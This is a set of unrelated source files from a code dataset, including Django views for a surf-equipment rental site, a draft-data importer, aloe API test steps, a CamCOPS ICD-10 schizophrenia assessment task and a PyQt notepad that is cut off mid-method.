windboard_rentals_user = RentalWindBoard.objects.filter(user_id=id)\n windsail_rentals_user = RentalWindSail.objects.filter(user_id=id)\n user = User.objects.get(id=id)\n user_profile = UserProfile.objects.filter(user_id=id)\n context = {\n 'user': user,\n 'user_profile': user_profile,\n 'windboard_rental': windboard_rentals_user,\n 'windsail_rental': windsail_rentals_user,\n 'storage': storage_user\n }\n return render(request, 'profile.html', context)\n\n\nclass PersonalDataView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n context = {'user': user}\n if user.is_superuser:\n context.update({\n 'error_msg': 'UWAGA, jesteś na profilu ADMIN, jeśli pola w formularzu nie są wypełnione, uzupełnij WSZYSTKIE'})\n else:\n userprofile = UserProfile.objects.get(user_id=id)\n p = user.userprofile\n context.update({'personal': p})\n context.update({'phone': p.phone})\n context.update({'sex': p.sex})\n context.update({'city': p.city})\n context.update({'street': p.street})\n context.update({'post': p.post_code})\n context.update({'birth': p.birth_date})\n context.update({'country': p.country})\n\n print(id)\n return render(request, 'personaldata.html', context)\n\n def post(self, request):\n birth_date = request.POST.get('birthdate')\n print(birth_date)\n phone = request.POST.get('phone')\n sex = request.POST.get('sex')\n city = request.POST.get('city')\n street = request.POST.get('street')\n postcode = request.POST.get('postcode')\n country = request.POST.get('country')\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n if user.is_superuser == False:\n userprofile = UserProfile.objects.get(user_id=id)\n userprofile.country = country\n userprofile.phone = phone\n userprofile.city = city\n userprofile.sex = sex\n userprofile.street = street\n userprofile.save()\n else:\n userprofile = UserProfile.objects.create(user_id=id, post_code=postcode, birth_date=birth_date, phone=phone,\n sex=sex, city=city, street=street, country=country)\n\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n context = {'user': user}\n if user.is_superuser == False:\n userprofile = UserProfile.objects.get(user_id=id)\n p = user.userprofile\n context.update({'personal': p})\n context.update({'phone': p.phone})\n context.update({'sex': p.sex})\n context.update({'city': p.city})\n context.update({'street': p.street})\n context.update({'post': p.post_code})\n context.update({'birth': p.birth_date})\n context.update({'country': p.country})\n current_user = request.user\n id = current_user.id\n user = User.objects.get(id=id)\n\n rentals_wind_board = RentalWindBoard.objects.filter(user_id=id)\n rentals_wind_sail = RentalWindSail.objects.filter(user_id=id)\n rentals_kite_kite = RentalKite.objects.filter(user_id=id)\n rentals_kite_board = RentalKiteBoard.objects.filter(user_id=id)\n storage = Storage.objects.filter(owner_id=id)\n context.update({'rentals_wind_board': rentals_wind_board})\n context.update({'rentals_wind_sail': rentals_wind_sail})\n context.update({'rentals_kite_board': rentals_kite_board})\n context.update({'rentals_kite_kite': rentals_kite_kite})\n\n return render(request, 'profile.html', context)\n\n\n## STORAGE WIND AND KITE\nclass WindStorageView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 
'storage_wind.html')\n\n def post(self, request):\n type = 'windsurfing'\n board_description = request.POST.get('board_description')\n sail_kite_description = request.POST.get('kite_sail_description')\n sail_or_kite = 1\n photo = request.FILES.get('myphoto')\n current_user = request.user\n id = current_user.id\n print('id', id, 'sail_kite_description', sail_kite_description)\n print(photo)\n if board_description != '' or sail_kite_description != '':\n msg = 'Sprzęt został dodany do pzrechowalni, twój unikalny kod id, dotyczący tego przechowania znajduje się w zakładce PROFIL'\n new = Storage.objects.create(type=type, board_description=board_description,\n sail_kite_description=sail_kite_description, owner_id=id,\n sail_or_kite=sail_or_kite, photo=photo)\n return render(request, 'wind.html', {'msg_storage': msg})\n\n\nclass KiteStorageView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'storage_kite.html')\n\n def post(self, request):\n type = 'kitesurfing'\n board_description = request.POST.get('board_description')\n sail_kite_description = request.POST.get('kite_sail_description')\n sail_or_kite = 2\n photo = request.FILES.get('myphoto')\n current_user = request.user\n id = current_user.id\n if board_description != '' or sail_kite_description != '':\n print('id', id, 'sail_kite_description', sail_kite_description)\n print(photo)\n msg = 'Sprzęt został dodany do pzrechowalni, twój unikalny kod id, dotyczący tego przechowania znajduje się w zakładce PROFIL'\n new = Storage.objects.create(type=type, board_description=board_description,\n sail_kite_description=sail_kite_description, owner_id=id,\n sail_or_kite=sail_or_kite)\n return render(request, 'wind.html', {'msg_storage': msg})\n\n\nclass AddWindSailsView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddWindsailForm()\n sails = WindSail.objects.all()\n return render(request, 'addwindsails.html', {'sails': sails, 'form': form})\n\n def post(self, request):\n form = AddWindsailForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n sails = WindSail.objects.all()\n return render(request, 'addwindsails.html', {'msg': 'Żagiel dodany do bazy', 'form': form, 'sails': sails})\n\n else:\n return HttpResponseRedirect('/add_windsails/')\n\n\nclass AddWindBoardsView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddWindboardsForm\n boards = WindBoard.objects.all()\n return render(request, 'addwindboards.html', {'form': form, 'boards': boards})\n\n def post(self, request):\n form = AddWindboardsForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n type = form.cleaned_data['type']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n # new = WindBoard.objects.create(brand=brand, type=type, description=description, size=size)\n boards = WindBoard.objects.all()\n return render(request, 'addwindboards.html',\n {'msg': 'deska dodana do bazy', 'form': form, 'boards': boards})\n\n # brand = request.POST.get('brand')\n # description = request.POST.get('description')\n # size = request.POST.get('size')\n # type = request.POST.get('type')\n else:\n return HttpResponseRedirect('/add_wind_boards/')\n\n\nclass 
AddKiteBoardsView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddKiteboardsForm\n boards = KiteBoard.objects.all()\n return render(request, 'addkiteboards.html', {'form': form, 'boards': boards})\n\n def post(self, request):\n form = AddKiteboardsForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n type = form.cleaned_data['type']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n # new = WindBoard.objects.create(brand=brand, type=type, description=description, size=size)\n boards = KiteBoard.objects.all()\n return render(request, 'addkiteboards.html',\n {'msg': 'deska dodana do bazy', 'form': form, 'boards': boards})\n\n # brand = request.POST.get('brand')\n # description = request.POST.get('description')\n # size = request.POST.get('size')\n # type = request.POST.get('type')\n else:\n return HttpResponseRedirect('/add_kiteboards/')\n\n\nclass AddKiteView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = AddKiteForm()\n kites = KiteKite.objects.all()\n return render(request, 'addkites.html', {'sails': kites, 'form': form})\n\n def post(self, request):\n form = AddKiteForm(request.POST)\n if form.is_valid():\n brand = form.cleaned_data['brand']\n description = form.cleaned_data['description']\n size = form.cleaned_data['size']\n form.save()\n kites = KiteKite.objects.all()\n return render(request, 'addkites.html', {'msg': 'Latawiec dodany do bazy', 'form': form, 'sails': kites})\n\n else:\n return HttpResponseRedirect('/add_kites/')\n\n\nclass AddSuperUserView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n form = SignUpFormSuperUser()\n return render(request, 'add_superuser.html', {'form': form})\n\n def post(self, request):\n form = SignUpFormSuperUser(request.POST)\n if form.is_valid():\n form.save()\n\n # username = request.POST.get('username')\n # password1 = request.POST.get('password1')\n # password2 = request.POST.get('password2')\n # last_name = request.POST.get('last_name')\n # first_name = request.POST.get('first_name')\n # email = request.POST.get('email')\n # is_superuser = True\n # new = User.objects.create(last_login=datetime.datetime.now(),username=username, last_name=last_name,\n # first_name=first_name, password=password2, email=email, is_superuser=is_superuser, is_staff=True, is_active=True, date_joined=datetime.datetime.now())\n\n return render(request, 'adminview.html')\n\n\nclass SurfingView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n return render(request, 'surfing.html')\n\n\nclass AllStorageView(LoginRequiredMixin, View):\n login_url = '/'\n redirect_field_name = 'redirect_to'\n\n def get(self, request):\n storage = Storage.objects.all()\n return render(request, 'storage_all.html', {'storage': storage})\n\n def post(self, request):\n storage_id = request.POST.get('storage')\n element = Storage.objects.get(id=storage_id)\n element.delete()\n storage = Storage.objects.all()\n return render(request, 'storage_all.html', {'msg': 'usunięto obiekt', 'storage': storage})\n\n\nclass PriceView(View):\n def get(self, request):\n return render(request, 'pricing_weather.html')\n\n@register.filter\ndef get_item(dictionary, key):\n return 
dictionary.get(key)\n\n\n","sub_path":"surf_rental/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"187976791","text":"import os\nimport pickle\nimport sys\nimport jsonpickle\nimport re\n\n\ndef cleanUp(x):\n\treturn x.replace('\"','').lower().strip()\n\ndef importDraft(inputFile):\n\tplayers = {}\n\twith open(inputFile, 'rb') as inFile:\n\t\theader = next(inFile)\n\t\theader = header.split(',')\n\t\tfirst_name_index = 0\n\t\tlast_name_index = 0\n\t\tplayer_score_index = 0\n\t\t\n\t\tfor index, elem in enumerate(header):\n\t\t\telem = cleanUp(elem)\n\t\t\t\n\t\t\tif elem == 'first_name':\n\t\t\t\tfirst_name_index = index\n\t\t\tif elem == 'last_name':\n\t\t\t\tlast_name_index = index\n\t\t\tif elem == 'player_score':\n\t\t\t\tplayer_score_index = index\n\t\t\n\t\tfor record in inFile:\n\t\t\trecord = record.split(',')\n\t\t\trecord = [cleanUp(x) for x in record]\n\t\t\tif len(record) < player_score_index: continue\n\t\t\t\n\t\t\tplayers[record[first_name_index] + ' ' + record[last_name_index]] = record[player_score_index]\n\treturn players\n\ndef saveDraftJSON(players, outputFile):\n\toutputString = jsonpickle.dumps(players)\n\twith open(outputFile, 'wb') as outFile:\n\t\toutFile.write(outputString)\n\nif __name__ == \"__main__\":\n\tinputFile = sys.argv[1];\n\tplayers = importDraft(inputFile)\n\tsaveDraftJSON(players, 'draft.json')","sub_path":"extractDraftFromFile.py","file_name":"extractDraftFromFile.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157256162","text":"import sys\nimport argparse\nfrom time import sleep\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='arguments')\n parser.add_argument(\"--inputs\", \"-i\", action=\"append\")\n parser.add_argument(\"--outputs\", \"-o\", action=\"append\")\n args = parser.parse_args()\n\n i = 0\n while True:\n i += 1\n print(i)\n sys.stdout.flush()\n sleep(1)\n","sub_path":"asn_server/Demos/system/toyexample/toy.py","file_name":"toy.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"456701998","text":"from aloe import step\nfrom tests.features.steps import api_test_steps\nimport os \n\nlogConfig = {}\n\n@step(r'a response for \"([^\"]*)\" exists')\ndef api_exists(step,apiCall):\n logConfig['apiCall'] = apiCall\n exists = api_test_steps.check_responses_for_call(apiCall)\n assert exists is True\n \n@step(r'create the log directory \"([^\"]*)\"')\ndef create_log_directory(step,path):\n logConfig['logDirPath'] = path\n try:\n os.makedirs(path)\n except:\n print(\"Path {} already exists\".format(path))\n \n@step(r'log the response to the file \"([^\"]*)\"')\ndef create_log_file(step,fileName):\n config = setup_logs(fileName)\n file = config[1]\n response = config[0]\n \n for i in response:\n nodeName = i\n responseVals = \"\" \n for x in response[i]:\n responseVals += \"\\t\" + x + \": \" + str(response[i][x]) + \"\\n\"\n statement = nodeName + \":\\n\" + responseVals\n file.write(statement) \n \n file.close()\n \n \n@step(r'log the neighbor response to the file \"([^\"]*)\"')\ndef create_neighbor_log_file(step,fileName):\n config = setup_logs(fileName)\n file = config[1]\n response = config[0]\n \n for i in response:\n nodeName = i\n for x in response[i]:\n if type(response[i][x]) != int:\n 
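# Hedged aside: isinstance(response[i][x], int) would be the idiomatic check here; note that, unlike type(...) != int, it also accepts int subclasses such as bool.\n 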
responseVals = \"\"\n for y in range(len(response[i][x])):\n for a in response[i][x][y]: \n responseVals += \"\\t\" + a + \": \" + str(response[i][x][y][a]) + \"\\n\"\n responseVals += \"\\n\"\n \n statement = nodeName + \":\\n\" + responseVals + \"\\n\\n\"\n file.write(statement)\n\n\n@step(r'log the tips response to the file \"([^\"]*)\"')\ndef create_tips_log_file(step,fileName):\n config = setup_logs(fileName)\n file = config[1]\n response = config[0]\n \n for i in response:\n nodeName = i\n responseVals = \"\" \n for x in response[i]:\n responseVals += \"\\n\\t\" + x + \": \" \n if type(response[i][x]) != int:\n #Maximum 250 entries for the log\n responseVals += \"\\n\"\n if len(response[i][x]) > 250:\n max = 250\n else: \n max = len(response[i][x])\n \n for y in range(max):\n responseVals += \"\\t\\tTip: \" + str(response[i][x][y]) + \"\\n\"\n \n else: \n responseVals += str(response[i][x])\n statement = nodeName + \":\\n\" + responseVals\n print(statement)\n \n file.write(statement) \n\n file.close()\n \n\n\n\n\n\n\n\ndef setup_logs(fileName):\n path = logConfig['logDirPath'] + fileName\n file = open(path,'w')\n apiCall = logConfig['apiCall']\n response = api_test_steps.fetch_response(apiCall)\n config = [response,file]\n \n return config\n\n","sub_path":"PythonRegression/tests/features/steps/api_log_steps.py","file_name":"api_log_steps.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"26810842","text":"#!/usr/bin/python2.7\n# -*- encoding: utf8 -*-\n\n\"\"\"\n Copyright (C) 2012-2015 Rudolf Cardinal (rudolf@pobox.com).\n Department of Psychiatry, University of Cambridge.\n Funded by the Wellcome Trust.\n\n This file is part of CamCOPS.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport pythonlib.rnc_web as ws\nfrom cc_modules.cc_constants import DATEFORMAT, PV\nfrom cc_modules.cc_dt import format_datetime_string\nfrom cc_modules.cc_html import (\n get_true_false_none,\n heading_spanning_two_columns,\n subheading_spanning_two_columns,\n tr_qa,\n)\nfrom cc_modules.cc_lang import is_false\nfrom cc_modules.cc_string import WSTRING\nfrom cc_modules.cc_task import (\n CLINICIAN_FIELDSPECS,\n CTV_DICTLIST_INCOMPLETE,\n ICD10_COPYRIGHT_DIV,\n STANDARD_TASK_FIELDSPECS,\n Task,\n)\n\n\n# =============================================================================\n# Icd10Schizophrenia\n# =============================================================================\n\nclass Icd10Schizophrenia(Task):\n A_FIELDSPECS = [\n dict(name=\"passivity_bodily\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Passivity: delusions of control, influence, or \"\n \"passivity, clearly referred to body or limb movements...\"),\n dict(name=\"passivity_mental\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"(passivity) ... 
or to specific thoughts, actions, or \"\n \"sensations.\"),\n dict(name=\"hv_commentary\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Hallucinatory voices giving a running commentary on the \"\n \"patient's behaviour\"),\n dict(name=\"hv_discussing\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Hallucinatory voices discussing the patient among \"\n \"themselves\"),\n dict(name=\"hv_from_body\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Other types of hallucinatory voices coming from some \"\n \"part of the body\"),\n dict(name=\"delusions\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Delusions: persistent delusions of other kinds that are \"\n \"culturally inappropriate and completely impossible, such as \"\n \"religious or political identity, or superhuman powers and \"\n \"abilities (e.g. being able to control the weather, or being in \"\n \"communication with aliens from another world).\"),\n dict(name=\"delusional_perception\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Delusional perception [a normal perception, \"\n \"delusionally interpreted]\"),\n dict(name=\"thought_echo\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought echo [hearing one's own thoughts aloud, just \"\n \"before, just after, or simultaneously with the thought]\"),\n dict(name=\"thought_withdrawal\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought withdrawal [the feeling that one's thoughts \"\n \"have been removed by an outside agency]\"),\n dict(name=\"thought_insertion\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought insertion [the feeling that one's thoughts have \"\n \"been placed there from outside]\"),\n dict(name=\"thought_broadcasting\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought broadcasting [the feeling that one's thoughts \"\n \"leave oneself and are diffused widely, or are audible to \"\n \"others, or that others think the same thoughts in unison]\"),\n ]\n B_FIELDSPECS = [\n dict(name=\"hallucinations_other\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Hallucinations: persistent hallucinations in any \"\n \"modality, when accompanied either by fleeting or half-formed \"\n \"delusions without clear affective content, or by persistent \"\n \"over-valued ideas, or when occurring every day for weeks or \"\n \"months on end.\"),\n dict(name=\"thought_disorder\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Thought disorder: breaks or interpolations in the train \"\n \"of thought, resulting in incoherence or irrelevant speech, or \"\n \"neologisms.\"),\n dict(name=\"catatonia\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Catatonia: catatonic behaviour, such as excitement, \"\n \"posturing, or waxy flexibility, negativism, mutism, and \"\n \"stupor.\"),\n ]\n C_FIELDSPECS = [\n dict(name=\"negative\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Negative symptoms: 'negative' symptoms such as marked \"\n \"apathy, paucity of speech, and blunting or incongruity of \"\n \"emotional responses, usually resulting in social withdrawal and \"\n \"lowering of social performance; it must be clear that these are \"\n \"not due to depression or to neuroleptic medication.\"),\n ]\n D_FIELDSPECS = [\n dict(name=\"present_one_month\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Symptoms in groups A-C present for most of the time \"\n \"during an episode of psychotic illness lasting for at least one \"\n \"month (or at some time during most of the days).\"),\n ]\n E_FIELDSPECS = [\n dict(name=\"also_manic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Also meets criteria for manic episode (F30)?\"),\n dict(name=\"also_depressive\", cctype=\"BOOL\", 
pv=PV.BIT,\n comment=\"Also meets criteria for depressive episode (F32)?\"),\n dict(name=\"if_mood_psychosis_first\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"If the patient also meets criteria for manic episode \"\n \"(F30) or depressive episode (F32), the criteria listed above \"\n \"must have been met before the disturbance of mood developed.\"),\n ]\n F_FIELDSPECS = [\n dict(name=\"not_organic_or_substance\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"The disorder is not attributable to organic brain \"\n \"disease (in the sense of F0), or to alcohol- or drug-related \"\n \"intoxication, dependence or withdrawal.\"),\n ]\n G_FIELDSPECS = [\n dict(name=\"behaviour_change\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"A significant and consistent change in the overall \"\n \"quality of some aspects of personal behaviour, manifest as loss \"\n \"of interest, aimlessness, idleness, a self-absorbed attitude, \"\n \"and social withdrawal.\"),\n dict(name=\"performance_decline\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"Marked decline in social, scholastic, or occupational \"\n \"performance.\"),\n ]\n H_FIELDSPECS = [\n dict(name=\"subtype_paranoid\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"PARANOID (F20.0): dominated by delusions or \"\n \"hallucinations.\"),\n dict(name=\"subtype_hebephrenic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"HEBEPHRENIC (F20.1): dominated by affective changes \"\n \"(shallow, flat, incongruous, or inappropriate affect) and \"\n \"either pronounced thought disorder or aimless, disjointed \"\n \"behaviour is present.\"),\n dict(name=\"subtype_catatonic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"CATATONIC (F20.2): psychomotor disturbances dominate \"\n \"(such as stupor, mutism, excitement, posturing, negativism, \"\n \"rigidity, waxy flexibility, command automatisms, or verbal \"\n \"perseveration).\"),\n dict(name=\"subtype_undifferentiated\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"UNDIFFERENTIATED (F20.3): schizophrenia with active \"\n \"psychosis fitting none or more than one of the above three \"\n \"types.\"),\n dict(name=\"subtype_postschizophrenic_depression\", cctype=\"BOOL\",\n pv=PV.BIT, comment=\"POST-SCHIZOPHRENIC DEPRESSION \"\n \"(F20.4): in which a depressive episode has developed for at \"\n \"least 2 weeks following a schizophrenic episode within the last \"\n \"12 months and in which schizophrenic symptoms persist but are \"\n \"not as prominent as the depression.\"),\n dict(name=\"subtype_residual\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"RESIDUAL (F20.5): in which previous psychotic episodes \"\n \"of schizophrenia have given way to a chronic condition with \"\n \"'negative' symptoms of schizophrenia for at least 1 year.\"),\n dict(name=\"subtype_simple\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"SIMPLE SCHIZOPHRENIA (F20.6), in which 'negative' \"\n \"symptoms (C) with a change in personal behaviour (D) develop \"\n \"for at least one year without any psychotic episodes (no \"\n \"symptoms from groups A or B or other hallucinations or \"\n \"well-formed delusions), and with a marked decline in social, \"\n \"scholastic, or occupational performance.\"),\n dict(name=\"subtype_cenesthopathic\", cctype=\"BOOL\", pv=PV.BIT,\n comment=\"CENESTHOPATHIC (within OTHER F20.8): body image \"\n \"aberration (e.g. desomatization, loss of bodily boundaries, \"\n \"feelings of body size change) or abnormal bodily sensations \"\n \"(e.g. 
numbness, stiffness, feeling strange, depersonalization, \"\n \"or sensations of pain, temperature, electricity, heaviness, \"\n \"lightness, or discomfort when touched) dominate.\"),\n ]\n A_NAMES = [x[\"name\"] for x in A_FIELDSPECS]\n B_NAMES = [x[\"name\"] for x in B_FIELDSPECS]\n C_NAMES = [x[\"name\"] for x in C_FIELDSPECS]\n D_NAMES = [x[\"name\"] for x in D_FIELDSPECS]\n E_NAMES = [x[\"name\"] for x in E_FIELDSPECS]\n F_NAMES = [x[\"name\"] for x in F_FIELDSPECS]\n G_NAMES = [x[\"name\"] for x in G_FIELDSPECS]\n H_NAMES = [x[\"name\"] for x in H_FIELDSPECS]\n TASK_FIELDSPECS = (\n CLINICIAN_FIELDSPECS\n + [\n dict(name=\"date_pertains_to\", cctype=\"ISO8601\",\n comment=\"Date the assessment pertains to\"),\n dict(name=\"comments\", cctype=\"TEXT\",\n comment=\"Clinician's comments\"),\n ]\n + A_FIELDSPECS\n + B_FIELDSPECS\n + C_FIELDSPECS\n + D_FIELDSPECS\n + E_FIELDSPECS\n + F_FIELDSPECS\n + G_FIELDSPECS\n + H_FIELDSPECS\n )\n\n @classmethod\n def get_tablename(cls):\n return \"icd10schizophrenia\"\n\n @classmethod\n def get_taskshortname(cls):\n return \"ICD10-SZ\"\n\n @classmethod\n def get_tasklongname(cls):\n return u\"ICD-10 criteria for schizophrenia (F20)\"\n\n @classmethod\n def get_fieldspecs(cls):\n return STANDARD_TASK_FIELDSPECS + Icd10Schizophrenia.TASK_FIELDSPECS\n\n def get_clinical_text(self):\n if not self.is_complete():\n return CTV_DICTLIST_INCOMPLETE\n c = self.meets_general_criteria()\n if c is None:\n category = \"Unknown if met or not met\"\n elif c:\n category = \"Met\"\n else:\n category = \"Not met\"\n dl = [{\n \"content\": \"Pertains to: {}. General criteria for \"\n \"schizophrenia: {}.\".format(\n format_datetime_string(self.date_pertains_to,\n DATEFORMAT.LONG_DATE),\n category)\n }]\n if self.comments:\n dl.append({\"content\": ws.webify(self.comments)})\n return dl\n\n def get_summaries(self):\n return [\n self.is_complete_summary_field(),\n dict(name=\"meets_general_criteria\", cctype=\"BOOL\",\n value=self.meets_general_criteria(),\n comment=\"Meets general criteria for paranoid/hebephrenic/\"\n \"catatonic/undifferentiated schizophrenia (F20.0-F20.3)?\"),\n ]\n\n # Meets criteria? 
These also return null for unknown.\n def meets_general_criteria(self):\n t_a = self.count_booleans(Icd10Schizophrenia.A_NAMES)\n u_a = self.n_incomplete(Icd10Schizophrenia.A_NAMES)\n t_b = self.count_booleans(Icd10Schizophrenia.B_NAMES) + \\\n self.count_booleans(Icd10Schizophrenia.C_NAMES)\n u_b = self.n_incomplete(Icd10Schizophrenia.B_NAMES) + \\\n self.n_incomplete(Icd10Schizophrenia.C_NAMES)\n if t_a + u_a < 1 and t_b + u_b < 2:\n return False\n if self.present_one_month is not None and not self.present_one_month:\n return False\n if ((self.also_manic or self.also_depressive)\n and is_false(self.if_mood_psychosis_first)):\n return False\n if is_false(self.not_organic_or_substance):\n return False\n if ((t_a >= 1 or t_b >= 2)\n and self.present_one_month\n and (\n (is_false(self.also_manic)\n and is_false(self.also_depressive))\n or self.if_mood_psychosis_first\n )\n and self.not_organic_or_substance):\n return True\n return None\n\n def is_complete(self):\n return (\n self.date_pertains_to is not None\n and self.meets_general_criteria() is not None\n and self.field_contents_valid()\n )\n\n def heading_row(self, wstringname, extra=None):\n return heading_spanning_two_columns(\n WSTRING(wstringname) + (extra or \"\")\n )\n\n def text_row(self, wstringname):\n return subheading_spanning_two_columns(WSTRING(wstringname))\n\n def row_true_false(self, fieldname):\n return self.get_twocol_bool_row_true_false(\n fieldname, WSTRING(\"icd10sz_\" + fieldname))\n\n def row_present_absent(self, fieldname):\n return self.get_twocol_bool_row_present_absent(\n fieldname, WSTRING(\"icd10sz_\" + fieldname))\n\n def get_task_html(self):\n h = self.get_standard_clinician_block(True, self.comments) + u\"\"\"\n
    <div class=\"summary\">\n <table class=\"summary\">\n \"\"\" + self.get_is_complete_tr()\n h += tr_qa(WSTRING(\"date_pertains_to\"),\n format_datetime_string(self.date_pertains_to,\n DATEFORMAT.LONG_DATE, default=None))\n h += tr_qa(WSTRING(\"icd10sz_meets_general_criteria\")\n + u\" [1]\",\n get_true_false_none(self.meets_general_criteria()))\n h += u\"\"\"\n
    </table>\n
    </div>\n
    <div class=\"explanation\">\n \"\"\"\n h += WSTRING(\"icd10sz_comments\")\n h += u\"\"\"\n
    </div>\n <table class=\"taskdetail\">\n <tr>\n <th>Question</th>\n <th>Answer</th>\n </tr>\n \"\"\"\n\n h += self.heading_row(\"icd10sz_core\", \" [2]\")\n for x in Icd10Schizophrenia.A_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_other_positive\")\n for x in Icd10Schizophrenia.B_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_negative_title\")\n for x in Icd10Schizophrenia.C_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_other_criteria\")\n for x in Icd10Schizophrenia.D_NAMES:\n h += self.row_true_false(x)\n h += self.text_row(\"icd10sz_duration_comment\")\n for x in Icd10Schizophrenia.E_NAMES:\n h += self.row_true_false(x)\n h += self.text_row(\"icd10sz_affective_comment\")\n for x in Icd10Schizophrenia.F_NAMES:\n h += self.row_true_false(x)\n\n h += self.heading_row(\"icd10sz_simple_title\")\n for x in Icd10Schizophrenia.G_NAMES:\n h += self.row_present_absent(x)\n\n h += self.heading_row(\"icd10sz_subtypes\")\n for x in Icd10Schizophrenia.H_NAMES:\n h += self.row_present_absent(x)\n\n h += u\"\"\"\n
    </table>\n
    <div class=\"footnotes\">\n
    [1] All of:\n (a) at least one core symptom, or at least two of the other\n positive or negative symptoms;\n (b) present for a month (etc.);\n (c) if also manic/depressed, schizophreniform psychosis\n came first;\n (d) not attributable to organic brain disease or\n psychoactive substances.\n [2] Symptom definitions from:\n (a) Oyebode F (2008). Sims’ Symptoms in the Mind: An\n Introduction to Descriptive Psychopathology. Fourth\n edition, Saunders, Elsevier, Edinburgh.\n (b) Pawar AV & Spence SA (2003), PMID 14519605.\n </div>\n
    \n \"\"\" + ICD10_COPYRIGHT_DIV\n return h\n","sub_path":"server/tasks/icd10schizophrenia.py","file_name":"icd10schizophrenia.py","file_ext":"py","file_size_in_byte":17342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"470953602","text":"# -*- coding: utf-8 -*-\n#! /usr/bin/python\n\nimport sys\nimport os\nfrom PyQt4 import QtGui\nfrom PyQt4.QtCore import Qt\n\nimport design2\n\nclass Notepad(QtGui.QMainWindow, design2.Ui_MainWindow):\n def __init__(self, parent=None):\n super(Notepad, self).__init__(parent)\n\n self.filename = \"\"\n\n self.setupUi(self)\n\n\n self.closeAction.triggered.connect(self.close)\n self.newAction.triggered.connect(self.newFile) \n self.saveAction.triggered.connect(self.saveFile) \n self.openAction.triggered.connect(self.openFile)\n\n self.printAction.triggered.connect(self.printHandler)\n self.previewAction.triggered.connect(self.preview)\n\n\n def newFile(self):\n #self.textEdit.clear()\n spawn = Notepad(self)\n spawn.show()\n\n \n def saveFile(self):\n \n # Only open dialog if there is no filename yet\n if not self.filename:\n self.filename = QtGui.QFileDialog.getSaveFileName(self, 'Save File','.')\n\n # Append extension if not there yet if you use python3:\n # if not self.filename.endswith(\".wrt\"):\n if not self.filename.endsWith(\".wrt\"):\n self.filename += \".wrt\"\n\n # We just store the contents of the text file along with the\n # format in html, which Qt does in a very nice way for us\n with open(self.filename,\"wt\") as file:\n 